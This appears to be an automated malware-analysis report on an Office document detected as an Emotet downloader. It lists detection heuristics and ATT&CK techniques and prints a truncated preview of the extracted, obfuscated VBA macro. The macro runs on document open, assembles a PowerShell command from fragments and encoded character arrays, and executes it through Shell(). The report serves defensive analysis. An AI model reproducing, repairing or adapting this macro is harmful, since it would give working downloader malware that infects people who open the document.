MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is configured to execute a 'Shell()' command, which is a strong indicator of a downloader. ClamAV identifies the file as 'Doc.Downloader.Emotet-7349882-0', suggesting it's part of a known downloader family. The VBA script itself is heavily obfuscated, but the presence of the Shell() call and the ClamAV signature strongly suggest its purpose is to download and execute a secondary payload.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-7349882-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7349882-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12381 bytes |
SHA-256: 8fc1575e5d3938ccb64157c8e69104c7af494b2f6d735913b26754a8099af428 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "kmIbiCNdvNo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function FUsjShqvRQ()
On Error Resume Next
bcRmt = 39485
DYtWi = CByte(sRsiX)
iojon = ZOXAwL
UTQvJ = CDate(12501)
kTNGdb = CDate(TtjktW + Sin(36122 + 20849) * 65959 * CInt(7979))
IfMkoq = 34184
uwAzh = 15697
AmJlMa = CByte(SBvflj)
LzGdNL = IElAqO
EhXiC = CDate(54634)
KiWrm = CDate(krjpF + Sin(36518 + 71052) * 26239 * CInt(70086))
QffbqE = 74733
ZWuaVG = 49553
vBUqL = CByte(wwAztN)
hihar = YGYSA
BDudCY = CDate(51340)
JXjERZ = CDate(jmqiil + Sin(79590 + 98077) * 41687 * CInt(46728))
Sizfmi = 77399
uJNPNI = 22165
BLEYEl = CByte(sGifVf)
shsGZD = SGiIvj
ARioX = CDate(99179)
GDUhmX = CDate(VRNiz + Sin(88008 + 10081) * 24239 * CInt(25528))
lLvuI = 69906
FUsjShqvRQ = SYAAmhzrZQR + Chr$(pBMXthawX + 80 + SlFLa) + "OwerSH" + dtOVtBP + whhTcqpKPtN + lmiZrznp + jkMfFwjbCz + XMsOVG
SNSXoV = 95325
lGoEG = CByte(qHdjAW)
aduESO = OclZD
joOZk = CDate(76993)
nwKEcl = CDate(TZjkhA + Sin(93461 + 38600) * 54432 * CInt(39814))
EhAinv = 69553
VVXhuw = 36057
SMMuh = CByte(LDijw)
JQtWz = GzoMM
OIouWk = CDate(62887)
ANjjkQ = CDate(HWWXS + Sin(79980 + 85815) * 19828 * CInt(48436))
dLJPTU = 8437
End Function
Function fCSDq(AhOIOzwBvV)
On Error Resume Next
jJRFDj = 23239
iGWwP = CByte(NUncDN)
NQvwoc = RqGzNN
jwDsb = CDate(86784)
OCWXF = CDate(jzwoTQ + Sin(77188 + 96795) * 41332 * CInt(65851))
cnAub = 68544
sWBNWz = 18631
ZbLNNi = CByte(zMaaj)
zAiRqo = BDsdj
Onjlk = CDate(52075)
dnEtwr = CDate(uukSd + Sin(62317 + 59195) * 34087 * CInt(59528))
blXSJ = 73280
FOvbHu = WzNrzA + Shell(JlTdzWJzz + AhOIOzwBvV + HrwVFEM, 40973 - 40973)
RPVJQ = 5011
HzAbzI = CByte(mksZnw)
bpBftV = mYTWSF
svzrKa = CDate(17296)
FNVfHW = CDate(iYBnMM + Sin(7670 + 6105) * 32010 * CInt(62568))
SarmFR = 322
End Function
Private Sub Document_open()
On Error Resume Next
BFTXz = 73226
osiKj = CByte(TfaUzs)
HVdzuR = GZiXk
wQIGw = CDate(21299)
lMQKOb = CDate(ovLWV + Sin(2445 + 28200) * 68368 * CInt(53207))
Naosmc = 52619
vIsik = 28779
drGOoU = CByte(bhuquw)
wcOzH = vicTGM
pwiDz = CDate(95657)
jJcGAP = CDate(NlUKC + Sin(38729 + 54192) * 66000 * CInt(46845))
bnRCz = 65109
Application.Run RmbzNnpE + "fCSDq" + YXauEhbALu, SBEIRb + FUsjShqvRQ + PvrRsBT
IoFnNv = 49391
ricHXa = CByte(UjvZL)
wojUSh = XWwjQ
YXvFAb = CDate(86731)
lRfAt = CDate(HWalL + Sin(46264 + 29264) * 81498 * CInt(96221))
iNUjJ = 12161
zGdaz = 96657
JNnRi = CByte(EGMsY)
jBrGcB = HFCCpc
DKHiv = CDate(32030)
MrYrrF = CDate(kusKIU + Sin(38434 + 47594) * 94505 * CInt(19943))
JJmRlV = 92081
End Sub
Attribute VB_Name = "woKOBjDk"
Function dtOVtBP()
On Error Resume Next
TrEMLw = CDate(pZXYr + Sin(30956 + 42045) * 20637 * CInt(92364))
Rcsuo = CDate(32295)
RVqhpi = 10853
fzjmQ = CByte(KELck)
wtYmmf = 51491
LUGnt = kuzdVp
TKiljiwpiq = "ell . ( $" + "sHeLLID[1]+$she" + "LLiD[13]+'" + "x') (" + Chr(34) + " $(SeT-i" + "TEm 'vArIab"
TdjfVm = CDate(frPJMz + Sin(18437 + 59491) * 95542 * CInt(28798))
MUhzw = CDate(51972)
VoOYkj = 75460
UjGjVi = CByte(KDZwU)
YnFIRr = 93355
HOZNj = hGSIT
YtSLW = "Le:ofs" + "' '' ) " + Chr(34) + "+" + "[sTRin" + "g]('42%74,69u"
ornBo = CDate(ZWkuvw + Sin(91175 + 67746) * 18897 * CInt(53133))
UhMKr = CDate(42345)
LiroTn = 31286
XIhWSq = CByte(MFFtXw)
wufiQ = 87839
PhwsCL = ZcwNJc
zLNLDiQpKu = "127!" + "71u74A" + "111" + ",46N51%46,96!" + "10" + "7!121!35" + ",97&108!100M10" + "7%109u122%" + "46&124M111"
QAtha = CDate(oiChAw + Sin(96194 + 48314) * 31744 * CInt(6511))
LBLMIl = CDate(98312)
isPqV = 21940
bDfKGP = CByte(KXNmfq)
MZzZmi = 33621
MNlWR = kDtSqD
ApftPKSN = "%96j106!97" + "A99A5" + "3!42f79N12" + "3,86A101"
YmllfY = CDate(QiGrF + Sin(23965 + 30805) * 60877 * CInt(10887))
jSziXV = CDate(51938)
oKVoL = 8418
rdmlII = CByte(YNfwEI)
njErF = 820
VQAmuo = JtHrX
bNwzjDYZ = "&1" + "20&46u5" + "1%46,96%1" + "07
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.